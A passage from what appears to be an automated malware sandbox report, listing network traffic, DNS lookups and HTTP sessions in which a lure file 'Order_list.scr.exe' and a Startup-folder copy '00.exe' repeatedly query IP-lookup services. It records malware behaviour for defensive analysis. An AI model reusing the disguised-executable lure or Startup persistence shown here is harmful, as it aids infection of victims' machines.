Jan 13, 2025 10:12:29.326039076 CET	80	49767	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:29.326105118 CET	49767	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:29.326865911 CET	80	49769	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:29.326940060 CET	49769	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:29.327056885 CET	49769	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:29.331826925 CET	80	49769	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:30.023576975 CET	80	49769	132.226.247.73	192.168.2.4
Jan 13, 2025 10:12:30.025152922 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:30.025222063 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.025330067 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:30.025605917 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:30.025628090 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.066972017 CET	49769	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:12:30.491704941 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.493824005 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:30.493880033 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.638303995 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.638380051 CET	443	49770	104.21.64.1	192.168.2.4
Jan 13, 2025 10:12:30.638458967 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:30.639147997 CET	49770	443	192.168.2.4	104.21.64.1
Jan 13, 2025 10:12:34.856240988 CET	61409	53	192.168.2.4	162.159.36.2
Jan 13, 2025 10:12:34.861143112 CET	53	61409	162.159.36.2	192.168.2.4
Jan 13, 2025 10:12:34.861229897 CET	61409	53	192.168.2.4	162.159.36.2
Jan 13, 2025 10:12:34.866139889 CET	53	61409	162.159.36.2	192.168.2.4
Jan 13, 2025 10:12:35.307612896 CET	61409	53	192.168.2.4	162.159.36.2
Jan 13, 2025 10:12:35.312755108 CET	53	61409	162.159.36.2	192.168.2.4
Jan 13, 2025 10:12:35.312861919 CET	61409	53	192.168.2.4	162.159.36.2
Jan 13, 2025 10:13:12.843734980 CET	80	49736	132.226.247.73	192.168.2.4
Jan 13, 2025 10:13:12.843878984 CET	49736	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:13:19.510890961 CET	80	49748	132.226.247.73	192.168.2.4
Jan 13, 2025 10:13:19.510987997 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:13:26.619700909 CET	80	49756	132.226.247.73	192.168.2.4
Jan 13, 2025 10:13:26.620141983 CET	49756	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:13:35.023154974 CET	80	49769	132.226.247.73	192.168.2.4
Jan 13, 2025 10:13:35.023335934 CET	49769	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:13:54.520473003 CET	49748	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:13:54.525255919 CET	80	49748	132.226.247.73	192.168.2.4
Jan 13, 2025 10:14:10.039356947 CET	49769	80	192.168.2.4	132.226.247.73
Jan 13, 2025 10:14:10.044112921 CET	80	49769	132.226.247.73	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:12:04.610424042 CET	51547	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:12:04.617789030 CET	53	51547	1.1.1.1	192.168.2.4
Jan 13, 2025 10:12:05.600873947 CET	59013	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:12:05.608263969 CET	53	59013	1.1.1.1	192.168.2.4
Jan 13, 2025 10:12:34.855633020 CET	53	64138	162.159.36.2	192.168.2.4
Jan 13, 2025 10:12:35.355185032 CET	50839	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:12:35.377388000 CET	53	50839	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 10:12:04.610424042 CET	192.168.2.4	1.1.1.1	0x9ea1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.600873947 CET	192.168.2.4	1.1.1.1	0xaf07	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:35.355185032 CET	192.168.2.4	1.1.1.1	0x25b8	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:04.617789030 CET	1.1.1.1	192.168.2.4	0x9ea1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:05.608263969 CET	1.1.1.1	192.168.2.4	0xaf07	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:12:35.377388000 CET	1.1.1.1	192.168.2.4	0x25b8	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:04.640069008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:05.341131926 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:05.345182896 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:05.559529066 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:06.264095068 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:06.484824896 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:07.134248018 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:07.930176020 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:08.559062958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:09.252350092 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:09.868433952 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:10.578663111 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:11.214314938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:11.888705015 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:12.514905930 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:13.194729090 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	132.226.247.73	80	3584	C:\Users\user\Desktop\Order_list.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:13.824549913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:14.512423038 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:18.308895111 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:19.001573086 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:19.010643959 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:19.230863094 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:20.059282064 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:20.270972967 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:20.918590069 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 10:12:21.619364977 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49760	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:23.181508064 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:24.707535982 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:24.707962036 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 10:12:24.708024979 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49763	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:25.304470062 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:25.977600098 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49765	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:26.706052065 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 10:12:27.406127930 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 09:12:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49767	132.226.247.73	80	6256	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:12:28.008965969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
